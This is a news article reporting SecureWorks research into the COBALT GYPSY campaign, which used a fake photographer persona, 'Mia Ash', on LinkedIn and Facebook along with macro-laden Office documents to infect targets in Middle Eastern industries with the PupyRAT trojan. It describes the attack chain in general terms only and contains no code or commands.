A campaign using a fake female persona to infect the Windows computers of people working in certain industries in the Middle East and North Africa with remote access trojans has been uncovered by the Counter Threat Unit of security company SecureWorks.
However, apart from gaining total access to their targets' computers, there was no indication offered by SecureWorks as to the endgame of the attackers.
The initial phishing that targeted the organisations was observed between 28 December 2016 and 1 January this year. Researchers from the company released details of their final findings today.
Messages sent as part of the phishing contained shortened URLs which, when clicked, resulted in the downloading of a Microsoft Word document which then attempted to run a macro that ran a PowerShell command.
{loadposition sam08}This resulted in the downloading of additional PowerShell scripts that loaded the remote access trojan PupyRAT to the victim's machine. Once installed, the attacker had full access to the victim's system.
Asked if any particular Windows or Office vulnerability was being used to infect the victim's system, SecureWorks Counter Threat Unit senior security intelligence analyst and researcher Allison Wikoff told iTWire that in the specific instances observed by the company, PupyRAT did not use any specific flaw to install itself.
Screenshot of the Facebook page created for the fake female persona Mia Ash.
Two weeks after the initial phishing campaign, an intended victim at one of the organisations that had been targeted was contacted via LinkedIn by someone who claimed to be a London-based photographer with the name Mia Ash.
The excuse for making contact was that it was part of an exercise of reaching out to people globally. After a while, Mia Ash encouraged the target to add her as a friend on Facebook and continue communication there.
SecureWorks said that communication continued through email, WhatsApp and Facebook until 12 February when the target was sent a Microsoft Excel spreadsheet, entitled "Copy of Photography Survey.xlsm" and encouraged to open it on a work computer in order for it to function properly.
The survey contained macros that, when run, download the same trojan. SecureWorks CTU said it was somewhat sure that the campaign was run by a group known as COBALT GYPSY which has been associated with Iran in the past.
The group has, in the past, been observed targeting organisations in the telecommunications, government, defence, oil and financial services verticals based in the Mideast or North Africa through spear phishing, having identified individuals through social media sites.
Screenshot of another page from the fake profile.
But the researchers said this latest campaign was of interest because of the pain the attackers had gone to in order to build up the persona of Mia Ash. Details had been posted on LinkedIn which appeared to be taken from a genuine profile.
The same images were used for the Mia Ash persona across different social media profiles and the CTU researchers said they were more or less certain that these photos had been taken from the social media accounts of an actual Romanian photographer. This individual was very likely a student and the images were likely to have been taken from among those uploaded to sites like DeviantArt, Instagram and Facebook.
They said their analysis of a number of connections made by the Mia Ash persona showed that these fell into two main categories: photography and non-photography profiles. The photography connections had been chosen to make the persona more authentic; the non-photography connections were from Saudi Arabia, the US, Iraq, Iran, Israel, India and Bangladesh working for technology, oil/gas, healthcare, aerospace and consulting organisations.
The latter category of connections were all with mid-level employees in technician (mechanical and computer) or project managerial type roles with job titles including: technical support engineer, software developer and system support.
A timeline of activity for the fake female persona.
One of the victims, whom the CTU researchers called Victim A, had social media accounts on LinkedIn, Facebook (two), a WordPress site, a Twitter account, a Blogger site and an Instagram account. This person was judged to be a strategic target and had more than 10 years of experience in the oil/gas, aviation, and telecommunications industries.
When it was pointed out by iTWire that the use of attractive women to entrap men was an old tactic that had been often used by the KGB during the Cold War, Wikoff responded that in this case it was different as images had been stolen and a fake persona created with great care.
The SecureWorks report described the approach as one that " "demonstrates the creativity and persistence threat actors will employ to compromise their targets".
Justifying this description, Wikoff said as examples of the level of detail that been gone to, Mia Ash had a favourite football team (Arsenal) and stated hobbies (photography, gym, travelling) which were listed across several of her profiles, in addition to sharing her like of a wide range of music on Facebook.
Additionally, COBALT GYPSY kept multiple social media profiles of Mia Ash active from at least April 2016 or earlier, up to the time when new photo was posted to her Facebook account in March 2017.
"Persistence is defined as 'the continuance in a course of action in spite of difficulty or opposition'," Wikoff said. "COBALT GYPSY wasn't successful during their first phishing campaign against a target which is when they used Mia Ash to achieve their objectives. COBALT GYPSY was clearly determined to gain access into this targeted organisation and willing to try several strategies to do so."
Graphics: courtesy SecureWorks.